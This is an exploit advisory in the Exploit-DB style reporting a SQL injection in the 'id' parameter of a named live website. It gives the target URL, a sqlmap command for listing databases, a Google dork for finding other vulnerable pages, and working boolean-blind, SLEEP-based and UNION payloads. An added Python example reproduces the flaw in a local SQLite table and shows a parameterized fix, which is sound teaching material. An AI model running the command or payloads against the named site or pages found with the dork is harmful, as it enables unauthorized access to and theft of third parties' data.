****************************
#Exploit Title: TRMH - SQL Injection vulnerability
#Date: 2020-08-12
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://www.trmh.com
#Google Dork: more_details.php?id=
#Tested On: Windows 10
sqlmap command used:
sqlmap -u "https://www.trmh.com/news.php?id=75" -p id --dbs
Testing methods:
- boolean-based blind
- time-based blind
- UNION query
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (6333=6333) THEN 75 ELSE (SELECT 5046 UNION SELECT 9683) END))
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: id=75 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=75 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a626271,0x6868426168486c664e6e75724f4d74796a44726c534e636465477a4170465677617468475958704d,0x7171787071)-- -
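The mechanism behind the sqlmap findings above, shown as an added example that is not part of the advisory: the `id` value is concatenated into the query, so the boolean-based and UNION payloads from this page change the statement, while a numeric check plus a bound parameter leaves them inert. The table layout and sample row are constructed stand-ins for the site's data, and the UNION payload is adapted to SQLite (five NULL/marker columns with `||` in place of MySQL's `CONCAT`), since the real schema and DBMS are not on the page.

```python
import sqlite3

# Constructed stand-in for the site's news table: five columns, matching the
# "Generic UNION query (NULL) - 5 columns" finding in the sqlmap output above.
def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, tags TEXT)")
    conn.execute("INSERT INTO news VALUES (75, 'Article 75', 'Sample body', 'staff', 'news')")
    return conn

CONN = build_sample_db()

# Boolean-based payload exactly as reported on the page; UNION payload adapted to SQLite
# (same 5-column shape, marker built with || instead of CONCAT). SLEEP() is MySQL-only
# and therefore not reproduced here.
BOOLEAN_PAYLOAD = "(SELECT (CASE WHEN (6333=6333) THEN 75 ELSE (SELECT 5046 UNION SELECT 9683) END))"
UNION_PAYLOAD = "75 UNION ALL SELECT NULL,NULL,NULL,NULL,'qzbbq'||'MARKER'||'qqxpq'-- -"

def fetch_vulnerable(conn, user_input):
    # The vulnerable pattern: untrusted GET input pasted straight into the SQL text.
    sql = f"SELECT id, title, body, author, tags FROM news WHERE id={user_input}"
    return conn.execute(sql).fetchall()

def fetch_safe(conn, user_input):
    # Hardened form: reject anything that is not an integer, then bind the value
    # as a parameter so it can never be parsed as SQL.
    try:
        article_id = int(user_input)
    except (TypeError, ValueError):
        return []  # treat a non-numeric id as "no such article"
    sql = "SELECT id, title, body, author, tags FROM news WHERE id=?"
    return conn.execute(sql, (article_id,)).fetchall()

if __name__ == "__main__":
    # Boolean payload evaluates to 75, so the page still renders: a true/false oracle.
    print("boolean, vulnerable:", fetch_vulnerable(CONN, BOOLEAN_PAYLOAD))
    # UNION payload appends an attacker-chosen row whose marker lands in the 5th column.
    print("union, vulnerable:  ", fetch_vulnerable(CONN, UNION_PAYLOAD))
    # Same inputs against the hardened query return nothing; a normal id still works.
    print("boolean, safe:      ", fetch_safe(CONN, BOOLEAN_PAYLOAD))
    print("union, safe:        ", fetch_safe(CONN, UNION_PAYLOAD))
    print("id=75, safe:        ", fetch_safe(CONN, "75"))
```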
**************************************************
#Discovered by: Mahdi Karimi
#Email: mjoker22mjoker22@gmail.com
**************************************************